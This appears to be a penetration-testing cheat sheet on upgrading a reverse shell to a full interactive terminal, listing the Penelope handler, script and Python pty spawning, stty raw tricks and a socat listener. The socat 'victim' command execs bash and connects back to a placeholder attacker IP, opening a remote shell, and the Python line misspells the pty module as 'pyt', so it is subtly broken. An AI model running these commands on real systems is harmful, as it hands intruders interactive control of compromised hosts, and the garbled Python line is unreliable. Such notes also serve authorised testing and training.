Penelope

<https://github.com/brightio/penelope>

penelope -p 80

Script

script /dev/null -c bash
export TERM=xterm-256color

Python

python3 -c 'import pyt; pyt.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
export TERM=xterm-256color

Socat

# Socat
# attacker
socat file:`tty`,raw,echo=0 tcp-listen:4444

# victim (if socat is installed)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:
[attacker_IP]:4444